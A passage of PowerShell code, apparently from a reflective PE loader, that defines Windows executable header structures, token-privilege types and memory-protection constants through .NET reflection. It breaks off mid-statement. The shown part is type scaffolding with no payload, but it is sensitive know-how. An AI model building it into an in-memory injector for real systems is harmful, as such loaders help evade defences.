http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html $Domain = [AppDomain]::CurrentDomain $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] ############ ENUM ############ #Enum MachineType $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null $MachineType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType #Enum MagicType $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null $MagicType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType #Enum SubSystemType $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null $SubSystemType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType #Enum DllCharacteristicsType $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null $DllCharacteristicsType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType ########### STRUCT ########### #Struct IMAGE_DATA_DIRECTORY $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY #Struct IMAGE_FILE_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER #Struct IMAGE_OPTIONAL_HEADER64 $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 #Struct IMAGE_OPTIONAL_HEADER32 $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 #Struct IMAGE_NT_HEADERS64 $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 #Struct IMAGE_NT_HEADERS32 $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 #Struct IMAGE_DOS_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) $e_resField.SetCustomAttribute($AttribBuilder) $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) $e_res2Field.SetCustomAttribute($AttribBuilder) $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER #Struct IMAGE_SECTION_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) $nameField.SetCustomAttribute($AttribBuilder) $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER #Struct IMAGE_BASE_RELOCATION $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8) $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION #Struct IMAGE_IMPORT_DESCRIPTOR $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20) $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR #Struct IMAGE_EXPORT_DIRECTORY $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40) $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY #Struct LUID $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null $LUID = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID #Struct LUID_AND_ATTRIBUTES $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES #Struct TOKEN_PRIVILEGES $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES return $Win32Types } Function Get-Win32Constants { $Win32Constants = New-Object System.Object $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000 $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100 $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000 $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008 $Win32Constants | Add-Member -MemberType NoteProperty -Name 